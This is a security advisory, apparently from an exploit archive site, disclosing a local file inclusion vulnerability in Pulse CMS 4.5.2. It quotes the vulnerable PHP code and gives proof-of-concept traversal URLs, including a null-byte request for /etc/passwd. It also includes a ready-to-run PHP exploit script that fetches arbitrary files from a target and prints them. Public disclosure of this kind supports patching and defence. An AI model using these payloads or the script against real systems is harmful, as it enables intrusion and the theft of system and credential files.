Pulse CMS 4.5.2 - Local File Inclusion

2016.02.28
Credit: Ashiyane Digital Security Team
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Document Title: =============== Pulse CMS 4.5.2 - Local File Inclusion References (Source): ==================== http://ehsansec.ir/advisories/plusecms452-lfi.txt Release Date: ============= 2016-02-28 Product & Service Introduction: =============================== Pulse CMS is the easiest way to build and deploy a responsive, content managed website. Since it's a flat file CMS there is no complicated database setup, just copy it to your server and go.(https://www.pulsecms.com/) Software Link: ============== http://www.pulsecms.com/download/pulse.zip Vulnerability Type: ========================= Local File Inclusion Vulnerability Details: ============================== I discovered a local file inclusion vulnerability in Pulse CMS 4.5.2. Exploitation Technique: ======================= Remote Severity Level: =============== High Vulnerable File & Code: ======================= index.php 9 $page = (isset($_GET['p']) && !empty($_GET['p'])) ? $_GET['p'] : 'home'; 10 $page = htmlspecialchars($page, ENT_QUOTES, 'UTF-8'); 11 12 if (preg_match("///", $page)){ 13 if(file_exists("content/pages/".$page."home.txt")){ 14 $page = $page."home"; 15 } 16 } 27 include("content/pages/$page.txt"); Proof of Concept (PoC): ======================= -- Local File Inclusion -- http://localhost/pluse/index.php?p=../../../../YourPHP.php -- For include other type files use null byte nullbyte -- http://localhost/pluse/index.php?p=../../../../etc/passwd%00.php PHP Exploit <?php # index.php $target = $argv[1]; $file = $argv[2]; // page : index.php echo "Pulse CMS 4.5.2 - Local File Inclusion\n"; echo "Author : Ehsan Hosseini\n\n\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, $target.'index.php?p='.$file."%00.php"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); $ex = curl_exec ($ch); curl_close($ch); unset($ch); echo $ex; ?> Author: ================== Ashiyane Digital Security Team Ehsan Hosseini http://ehsansec.ir/ SPX tnx to: =========== Bl4ck_mohajem Contact: ======== hehsan979@gmail.com info@ehsansec.ir

References:

http://ehsansec.ir/advisories/plusecms452-lfi.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top